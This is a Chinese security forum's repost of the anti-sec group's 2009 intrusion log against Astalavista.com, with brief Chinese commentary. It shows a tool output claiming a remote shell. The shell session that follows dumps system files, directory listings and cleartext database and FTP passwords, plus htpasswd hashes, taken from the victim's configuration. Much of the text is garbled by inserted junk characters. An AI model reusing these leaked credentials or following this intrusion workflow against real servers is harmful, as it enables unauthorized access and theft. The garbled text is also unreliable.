中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]
作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
0 W, E$ q% T$ ~: \, @7 h9 x$ }4 r' }  g
[root@front3 ~]# curl -I litespeedtech.com
  h& V# r  ^9 P4 ]3 \HTTP/1.1 200 OK
. c$ |( u/ u7 I% g, k; LDate: Fri, 05 Jun 2009 22:54:51 GMT
* y/ `- v" y1 |1 G8 [Server: LiteSpeed4 s4 V" i2 I! ~/ g  c, |& e
* Q1 J3 y- L, N# c2 M% `
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
# J) f+ v3 ^, T1 j& E  @0 U; m0 y8 W) T  {8 J& a9 I
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
* |6 W- t+ A1 r( G/ ~, p7 Q
+ |' r* c6 v" n8 V& F4 f0 v1 p0 U( `* y
/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
; k4 A6 `' I( q  W/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
8 h. H2 M( @" |; ~0 C4 K+ T) s/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
, i! o, R) I1 R, E3 G& t\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /+ Z$ J- M3 A9 J& G$ R0 Q8 j! B
        \/        \/                 \/        \/       \/                     \/                 \/
$ @5 z0 M1 I8 a" |6 K9 P; B                                  The Hacking & Security Community" D# Y. j/ [: q7 Z
[+] Founded in 1997 by a hacker computer enthusiast5 G3 w. b% g: }( I$ B8 ?* a
[-] Exposed in 2009 by anti-sec group
% i3 t: y. A$ e% `: a6 r/ ^$ `0 A5 w* R7 t
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:; ?5 v5 E, [: B$ Y0 y; A4 j
>> 03. Who’s behind the site?5 V! |, C, S! u0 m% I3 ]  @
>>. c, `/ w: W( H/ S% y; K
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
6 j% P5 `% B5 N" w& e) Y
. w' v0 K& y; F2 B>> 05. Is it true that the site is visited by script-kiddies and warez fans only?. ^1 S% E1 T; f$ I9 s* k& s
>>% b9 O, x8 f' ?; W  t9 _. g
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and( m# B! o+ F$ @
military institutions.+ N$ C  W: B" y" i/ r
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.: n7 S! B+ W! i+ M

5 {' v* v5 q# ?% V) G6 r6 MWhy has Astalavista been targeted?
" F# f0 p. G" r; v( e
; o3 F% t$ g- mOther than the fact that they are not doing any of this for the “community” but; s. O$ z' ?4 F  o
for the money, they spread exploits for kids, claim to be a security community% n  U0 N5 d5 ?6 Z6 O8 ]
(with no real sense of security on their own servers), and they charge you $6.66
7 P% c$ |# }/ E0 w  K  qper months to access a dead forum with a directory filled with public releases1 L% m* P5 t( M
and outdated / broken services.0 Y1 V; J3 A) l- `4 M0 J
( u* r. e8 k0 h$ e
We wanted to see how good that “team of security and IT professionals” really is.; y( t% v" ~' |: K* c; J# J) R5 G+ ]

" b* E3 e; d" KLet’s begin.1 p, d% I$ O, x

7 ]8 Q& N: Q3 Q! q. r9 Ranti-sec:~# ./g0tshell astalavista.com -p 80
6 L" |0 j9 Y! ?+ E# @- M2 A[+] Connecting to astalavista.com:80
' t. Y0 ]0 k' z( d8 V[+] Grabbing banner…9 v' t4 E/ [( @* o. K7 O6 @3 u- T
LiteSpeed* }7 j3 W* l0 ^" V$ `9 R
[+] Injecting shellcode…+ q: O6 k1 u+ L0 x6 g, |9 S
[-] Wait for it1 N& A# T& z8 P4 k+ |
8 o2 l" O4 J+ b' [) ^6 ]2 a
[~] We g0tshell6 E4 o& b: Z* h. `( ^% k) _% w
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux3 g, g4 H4 ?7 X
ID: uid=100(apache) gid=500(apache) groups=500(apache)0 i5 y/ p' N$ @5 O7 |4 j

+ K# e+ H; s6 x, d, dsh-3.2$ cat /etc/passwd
8 }" l6 z2 D, d0 U2 V- eroot:x:0:0:root:/root:/bin/bash  {6 C4 Q; B$ O7 h$ m2 t! K
bin:x:1:1:bin:/bin:/sbin/nologin( k" m' J3 E: E$ I% U: b- g
daemon:x:2:2:daemon:/sbin:/sbin/nologin; K2 ]3 X! u, w+ S! H
adm:x:3:4:adm:/var/adm:/sbin/nologin
3 v$ s' V# a6 Mlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin( Q7 R/ z2 w* T$ f2 J0 R& V1 X8 [
sync:x:5:0:sync:/sbin:/bin/sync
  ~1 M2 k+ y% N. [shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
2 Z7 G: u* ^+ Whalt:x:7:0:halt:/sbin:/sbin/halt9 t3 |- o, i1 U2 `9 z8 `* A0 R  a+ s
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- M2 Y) t% Z! anews:x:9:13:news:/etc/news:  v: I  n5 i$ M7 Z3 E2 z/ H
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
8 {& Q" @  O% [  {7 {& c5 t( doperator:x:11:0perator:/root:/sbin/nologin
! r5 q& v% a: I& w' d/ Ogames:x:12:100:games:/usr/games:/sbin/nologin) |/ L, g. z9 o. T8 _0 a
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin8 @) M3 E3 ]: D6 {' j
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin; R; t; x. Y( ?
nobody:x:99:99:Nobody:/:/sbin/nologin
7 |7 f' a1 Z8 F. nrpm:x:37:37::/var/lib/rpm:/sbin/nologin" c* ?) J$ C$ N. P; ^" a
dbus:x:81:81:System message bus:/:/sbin/nologin( g; D' ]; P& d( ^" N
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
, d( c, V: ]) J) b1 f! smailnull:x:47:47::/var/spool/mqueue:/sbin/nologin0 l. e7 T( [* ~+ r) n
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin. e: J# C1 f$ {+ m1 g+ I% Z$ O
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin6 H5 q5 i/ m1 _1 T/ Z2 L2 M4 Q
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
! I: F. ?; `& b! G+ vrpc:x:32:32ortmapper RPC user:/:/sbin/nologin
; ?! `; X% `+ B; y/ i' ^/ Crpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
# f/ T! \* Z5 V$ Jnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin: `! L9 D# [/ M6 \& c
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin% }: T5 c8 D7 g) x4 U4 U- c+ r5 T
pcap:x:77:77::/var/arpwatch:/sbin/nologin
9 b' v2 A" Y7 s' ~, znamed:x:25:25:Named:/var/named:/sbin/nologin0 ]+ _, P) p9 v
apache:x:100:500::/var/www:/bin/false
0 n# q% A. L4 x0 adiradmin:x:101:101::/usr/local/directadmin:/bin/bash4 o" t3 @% S; q  j
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash- ~* C- @* _! i0 E. y
webapps:x:500:501::/var/www/html:/bin/bash
- U; e( G9 h2 w" h3 g% L/ N0 Qmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
1 m) L" L! Z; Iadmin:x:501:502::/home/admin:/bin/bash. ?) z& B5 p. j
jon:x:502:503::/home/jon:/bin/bash1 K: E" n! b/ M' W: e2 l" Y
com:x:503:504::/home/com:/bin/bash
/ Q- [; b6 M' gntp:x:38:38::/etc/ntp:/sbin/nologin
% N9 I' l6 O* V2 [3 w7 T2 U: nais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin0 _" Q0 x4 K3 U& y
astanet:x:504:505::/home/astanet:/bin/bash: v0 [5 O+ t/ L) C. ?, A1 o
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
4 K5 ^2 y* L9 o. U3 ]1 G. Pavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin/ `1 w9 V. [' t- o, K0 p+ K

0 o) z, U9 k" s- Wsh-3.2$ cat /etc/hosts
% G1 I- t8 H% t2 Q  X# Do not remove the following line, or various programs
9 w- s5 o; M& d9 r# that require network functionality will fail.0 F2 P: h' D$ t( A; w* n6 l
127.0.0.1       localhost.localdomain   localhost
5 w# I; B# B) `::1     localhost6.localdomain6 localhost6
  e' h. c$ Q6 t; L80.74.154.172           asta1.astalavistaserver.com
5 d( f8 }$ D' i$ ~8 _2 D4 [0 x3 n6 J
1 @) |1 b6 x! J8 a* E9 R! vsh-3.2$ pwd  ~# T' R# U7 ~
/home/com/public_html
/ p/ I3 X3 q1 k: M- s
( |& V8 v) M1 ksh-3.2$ ls -la
+ D$ V8 U( @& d5 W" [7 u- Ztotal 18460- _$ d3 x5 b2 d+ A9 U2 e
drwxr-xr-x 30 com apache     4096 May 28 17:06 .
1 e: T6 L2 i$ s1 J. w  u) bdrwx–x–x 11 com com        4096 Jun 25  2008 ..  i! i6 o) @8 e) b/ d
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
3 V; c( }% e+ V% H/ fdrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
3 @! N& \% x8 V' ^- xdrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin, z2 ?  J' D4 L$ x
drwxrwxrwx  2 com com        4096 May 19 00:50 config: L: q4 c5 P& c1 U6 R) r
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
. b8 N/ J" G# J5 Pdrwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules, \8 n! @4 k! d% Q  [
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing" q! l8 a; D4 c7 h' [# z9 m
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
: P  f# U3 J4 f- a7 ?+ Ydrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__4 C2 g1 }" \2 s' e! c2 T/ _1 @" H( S
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php  v( _% q6 b5 \% u* v) W! c6 ^" F
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd: X3 T' ^3 D) C: }4 P. T% f0 `5 ^
drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
5 j- _" D# Y3 {5 d" M; \-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
6 ?8 z8 ^0 p+ vdrwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
1 }  }4 O' q2 u; x. a-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess) @6 K+ b5 d: O1 R
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
& i9 l0 f8 _: F+ w2 J-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak+ H9 G5 a9 w( E: \- U6 T, _
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool- g8 D! X7 h4 |
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
4 m' F! a5 b4 @4 V! y-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
/ s/ V( V" ?4 I7 G' w2 zdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
& S; k4 |0 |5 M6 K2 S: ?drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
3 I5 V& z" ?' P8 p1 c* G" rdrwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
( g, |% f' v. g8 y4 G* Zdrwxrwxrwx 12 com com        4096 Jun  2 07:47 media2 {& L4 F- n: O% {
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
  n# `/ N/ L% M" g$ ^& Xdrwxr-xr-x 34 com com        4096 May 28 16:30 modules: r; n7 q( o8 C8 H0 A
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
: B5 A6 {0 u& U" ^drwxrwxr-x 22 com com        4096 May 28 17:06 _new# @8 H/ f: M) J( c
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old1 N6 ~5 P6 h7 {7 L9 L
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy: a8 J7 Y# ^& f; b2 q
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy! j9 Q  n8 w0 r8 {' C
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
2 P) H* [, J0 w4 r# R' L+ F3 o7 q-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml, X5 Q; R/ C- C8 ^" Q' r
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php$ `& j2 f9 U7 Z1 x$ `/ L
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
' {) o" Y6 |5 s( W! u7 D7 W5 ~drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp6 S& t9 n. P! ?, G
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
/ z7 h9 b" ?- t# q
! D2 |, P$ ~' s% P* ]- jsh-3.2$ head -20 index.php
3 S& A4 p. K9 H1 I& o! i. ~# p<?php& @7 v: G' J& G
- t$ I6 o& J, |5 n8 m
/**
( g4 u6 H1 @9 ~" k3 r: }0 h* The main page for the CMS9 Z+ E* F; q* |8 b% P1 N% T
* @copyright   CONTREXX CMS - COMVATION AG9 A. r! M+ k( P2 ~3 L+ Y% R
* @author      Comvation Development Team9 g, b2 z: g3 l
* @version     v1.0.9.10.1 stable
6 y& Q0 a4 K1 m$ Q  r6 [& d# l- T* @package        contrexx
  G9 ~& y* S; E1 w1 G/ b2 X% X* @subpackage    core! ~! c% F' |& j$ C' x: ~
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 [/ d* Q5 f1 x* @since       v0.0.0.0
$ M% r* |$ w' ?9 [  e9 T* @todo        Capitalize all class names in project
  D6 T# q. l4 Z+ s. }* @uses        /config/configuration.php
, K9 j  y. z; ^6 N5 `& k3 g$ k' l4 Z* @uses        /config/settings.php
9 g' Q* O! {$ j* d6 F/ W% n* @uses        /config/version.php2 M; P* ?8 M# l3 d( `
* @uses        /core/API.php
& Z5 r/ J1 P6 ~: h4 U1 A* @uses        /core_modules/cache/index.class.php$ z6 |8 H6 ~& m( `2 R2 N
* @uses        /core/error.class.php7 T* G9 U! u9 b, K
* @uses        /core_modules/banner/index.class.php
) v; o* E) r' V2 D; Q$ N( V  T- O* @uses        /core_modules/contact/index.class.php
" B, d- @; ~' G# R" H+ D3 S6 {
1 f+ W: Y( t$ M$ m4 y. E4 Zsh-3.2$ cd config/
% O9 R# u1 \7 a4 _% ]sh-3.2$ ls -la
8 D3 }% g3 y; v: J0 f; C# Ctotal 327 w" A) A# `+ i4 [4 s
drwxrwxrwx  2 com com    4096 May 19 00:50 .0 J( {; q6 y& C/ [5 k/ j2 l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..9 N! K) U! b/ Y4 x3 o6 ]$ G
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php5 T( N9 V8 G# U: `3 t' o
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php) J. ]/ T, c6 q7 t2 t5 O; h
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
3 p1 W* Q  D, o-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
7 Q8 X" Y5 s* x) J  W9 Z1 t# T$ A# w  @. `2 N/ C
sh-3.2$ cat configuration.php: l) H1 D& L) M' s6 }2 j
[snip]
" G3 A& q8 t6 b  |% k  }5 F$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
/ V4 `/ {% o6 J* p/ }* g2 E$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name% C+ d. M; U+ k6 p, e' g7 V
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix& A; ?( V4 }' g  Q* K
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username! b: ]5 t/ X" \6 n- S8 r- Q& V! R& e
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
; G: `) Y8 f, J3 ?( [$ ?7 u3 r  t$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
6 j" y5 M- A$ \" D) v; l! f$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..), ~  U3 u/ S7 b* g) V
[snip]6 O3 M; ^& [6 D+ u3 j
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
; K( G4 S9 X; z$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode' f% W- V' l5 H6 X
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost# m/ ?1 y! O9 m( u, G
$_FTPCONFIG['port'] = 21; // Ftp remote port
5 o2 ?' J. E& z' x6 f$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
% H2 E6 W$ }. r; D" U; y$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
- o& N! ^0 U  d  J' b+ x$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms2 q* Z, C  n% r1 n! g3 p

5 a+ Z% B3 Y% s* Psh-3.2$ cd ... X! k1 {& C5 G" i& |: K$ w
sh-3.2$ cd dvd/
, y& f5 [" e1 c2 ^1 \sh-3.2$ ls -la
8 K. K( X( k. E* }1 vtotal 2913780
% y6 w/ ~6 W4 W( `drwxr-xr-x  2 com com          4096 Sep  9  2008 .
7 K$ H% R& z5 idrwxr-xr-x 30 com apache       4096 May 28 17:06 ..
- j: q2 R9 X5 K' T-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
& t1 N& M! _2 ?% F-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
' S6 J. j  O1 ?4 f-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar  [" m2 }6 F  B* P6 }+ |
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess9 A  L  c( e! t2 ]3 Q! n

$ d6 @5 m: u5 k  H3 @8 E0 g, g, g8 [sh-3.2$ cat .htaccess
9 V4 z( Z3 X0 N) ^authType Basic  I+ L9 H6 `* R0 Y
authName DVD2 c( N* a# E" v
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd, _8 R9 v$ z! t7 O: H, y$ p* n5 N( G) m
require valid-user7 _! o" r- ~' |+ [; z

) Y" i* G% t9 q: n: d+ y# Msh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd' s9 T+ G& x( K2 q, Y, P" B0 E
DVDdownload:CRD8cuY6.MPT6  s- e" f% `& C% [7 s! U" b" _2 |
DVDdownload2:CR8a36.wluFMg: a9 V+ t/ U+ c! S9 C* L

8 U) p6 ~- ]5 R! F6 csh-3.2$ cat test.php
9 H" n- [( y1 t* t+ r/ N2 t<?php
. V" A; c% O1 l# C. V$ p6 x( A3 U$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
1 s3 v+ m2 z0 v$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
  |" R8 U  g; y0 P$ becho $url;
6 }* O4 u  r( j+ P?>4 c) j7 ?1 d, N! Q# {! l5 r8 M3 O7 N

7 d( c: {+ a* C3 }4 xsh-3.2$ cd modifications/* k1 y! Y4 m; ?2 |8 t# }
sh-3.2$ ls -la/ k* ]. _2 T( |& ]- V1 d+ L
total 32% b: e* K; n' l* W% |
drwxr-xr-x  8 com com    4096 May 11 12:48 .6 Y) ^; O9 z2 a0 @! `1 y+ C& I
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..2 w5 u, D/ w' x8 D0 g
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
6 |$ [+ c+ W4 Ddrwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs  p$ p/ I' s% i( ?" C
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools& q6 Y7 e2 B6 E) w1 Y
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
' e; }* P/ b2 t( Q; P1 Sdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
# `# d3 [" k2 qdrwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp7 H' c6 @3 O" P) @9 g! g: E
5 r5 `% N/ m' l. r' U/ l4 w: c% m# d
sh-3.2$ ls -R
4 r% Z' V7 d3 ^$ l2 ?) J.:
& W. R2 j$ f7 d5 y* C0 S# w6 pcom_avtng  cronjobs  onlinetools  pjirc  search  _tmp
/ \0 v9 m! i; L$ g3 b( J2 {
) E0 o5 k& T7 h  c./com_avtng:6 a( N/ \$ w/ _/ g# f2 j
avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts6 O( j* b# M9 _3 f3 q
; t, I8 c! e9 T* m
./com_avtng/scripts:0 L$ B9 V# O: M2 X# r
popunder.js
& ?& s% w7 g$ G. Z4 c+ t/ _7 V* S4 w8 n; ^2 q) W- @. M8 k  I
./cronjobs:% q8 k% _5 p# u0 r6 C2 J7 Y
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp" G+ v3 n9 ]$ t+ q

( E# k) ^; X" [" F( ^, W( D/ u./cronjobs/tmp:
3 ^" ~8 c1 p( y) _contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
$ o  H* b1 c8 W5 U1 c2 W2 Z" `: X. H, \6 g- p) y0 @* g- {
./onlinetools:
8 L( p0 |- a4 F1 H: x/ x9 l& uindex.php
: x7 [, ]- C. d! Y. r& |
; K% I: u* j# F) \./pjirc:
. t8 U" i* e% R; Ma_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt" S" K0 [) [) t( o2 {8 v
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt- {% c5 ]3 l) }$ @
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
& X2 w# H: k) }' U) \
$ `7 |8 M* b1 E" ?8 O" W./pjirc/img:) h3 a7 I0 r* O2 E- I( o) s: w5 g
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif" S3 ~5 D4 h8 @- Q
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
, C/ B; c4 e+ i( _4 P6 n6 cverre-eau.gif
0 `4 q6 V. ^# v' x( vargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  ( V% j5 ~- ~1 s( }' ~" }8 W
verre-vin.gif
! d6 T: P  k9 {' H: y' Wballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif% V6 ?+ |9 n( P7 a
biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
5 Q+ l% ?, o+ ^  d, C, Q( g% m( [% {: P+ O7 x1 T% V5 y6 ~
./pjirc/snd:
6 e, p; D0 n& C& @4 Pbell2.au  ding.au+ f) j+ A3 K( ]) M$ e7 A
: Z( C3 ]5 y% W8 g( o+ h/ h
./search:2 i7 [+ M: g& Z
searchEngines.php  search.php
; u, u& N1 k( {% `% S
) p6 y" B0 @" G: }./_tmp:6 u& h0 g) }7 q
defaultPorts.php  defaultPorts.txt
. f' X5 ?4 E4 @. z' @
* q, F9 Z4 f9 l  S1 y( {$ t: `sh-3.2$ cd cronjobs/
( s9 d. b3 g7 Y5 L2 fsh-3.2$ cat exploits.php, }+ H" n: ^1 C8 v; l" p
[snip]! {" W% f- Q1 S* c
$categories   = array();
. s5 I) k3 |7 ?1 Z/ Q) v4 S$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
6 u- k! R+ z/ s8 m- _% V- ~$expolits     = file($milw0rmFile);- Z0 y0 R& V6 i
$comExploits  = array();2 D6 J9 H1 ?$ x) ~  p
[snip]+ o& B9 B; G7 U! p7 _
// manage data
7 `* _2 h) A: |$ B/ E* ?, pfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640/ a/ y) m$ O$ V- U% I) j  Q* s

# {% O3 y& E  L* [    // get path and title
/ o" L  i! m! f' _3 N+ _% e    $expolits[$x] = trim($expolits[$x]);# Q6 ?: O* ~0 B2 g+ g6 d$ d
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
, `4 V% H/ ~4 }0 `  u    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);; B# g; E4 G+ z, \: K7 z
5 [# l& t- L; n  b
    // check if file exists+ f* i7 [7 U+ F/ k( R+ a# @
    if (file_exists($path)) {6 B2 B" }2 [1 `

. P0 e1 @5 s& D) t1 d' V        $text = file_get_contents($path);
$ Z1 M" i8 N8 t) V8 Z1 m* m9 {9 W0 F
        // get content and date
* N9 Q1 s, Z" Z( D7 V        //$text = htmlspecialchars($text, ENT_QUOTES);
4 ]* K$ w# b4 ]        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));# s( i$ n( U& j6 t
        if ($tmptext != ”) {3 h- t# b) g2 z: I5 s
            $text = $tmptext;
3 J! W% v0 s  P( n; G        } else {
+ j- b/ m; n2 Z            $text = addslashes(htmlentities($text,  ENT_QUOTES));
* q7 _3 q" J  x. `% E        }
* I# u( S: C8 G) r        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));& m7 n: P2 @0 e7 Q
        $tmp  = explode('-', $date);) s6 J% g5 I5 _
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));# }# ^! N- |, ~; y, I& M
        $cat  = getCategory ($path);
( P1 F/ W& D: k) a5 g  b1 q' R7 v        $ext  = pathinfo(basename($path));
. N+ j3 J' }7 @+ e3 R5 S        $ext  = $ext['extension'];
* `9 Z4 Z9 ~! v& i5 u5 j  H6 v5 A' y        $qStr = ”( A  C& f) g! Z) a2 E% D0 `0 Q; i
            SELECT  `id`0 I) t; |$ L, l. {
            FROM    `contrexx_module_exploits`, `: j4 [$ }/ e
            WHERE   `title`  =  ‘” . $title . “‘1 u6 `" |+ |+ A& p! U! q8 `+ c
            AND     `date`   =  ‘” . $date . “‘
# N4 `  q" ~2 o6 t, T1 Q/ `        “;! B0 F$ l0 d) S  J9 T  r
        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
# P& a( B9 r. m4 e3 G- s        $q = $_objDB->query($qStr);2 t; ?- ~8 D2 P! L
. p* H, {' m# N- P
        if ($q->numRows() == 0) {
$ d( B& K4 {, v# i1 M( Y) n/ v8 c7 C! Y( ?  `0 K1 x
            // prepare array+ P" C$ b% s$ Z0 u( Y4 ~$ d
            $comExploits[$x]['date']      = $date;4 R& m" d5 W0 A* ^/ \1 O
            $comExploits[$x]['title']     = $title;
5 Z+ f, ^4 b- J! ^3 C3 L2 _" o            $comExploits[$x]['author']    = ‘milw0rm’;4 f4 n- T  g& W+ P1 L. e8 z
            $comExploits[$x]['text']      = $text;# C/ ?* t! F: \# g7 X' b+ W
            $comExploits[$x]['source']    = $ext;
" K2 Q1 H4 V( N9 r& [' x1 f; s            $comExploits[$x]['url1']      = ”;
8 k; _+ |" F# v5 i            $comExploits[$x]['url2']      = ”;5 q0 {+ v  L  r6 B
            $comExploits[$x]['catid']     = $cat;! @, b2 X8 |! E% [) b" i3 M
            $comExploits[$x]['lang']      = ‘2′;, k2 ^" l# P/ ~  `& `. W' c# y
            $comExploits[$x]['userid']    = ‘12′;/ [1 b* ^) n6 C/ Z
            $comExploits[$x]['startdate'] = ‘0000-00-00′;6 Z- k9 d" e1 B: y/ g
            $comExploits[$x]['enddate']   = ‘0000-00-00′;
2 S" M* y. ^! s: l            $comExploits[$x]['status']    = ‘1′;9 J. L3 E6 c& w
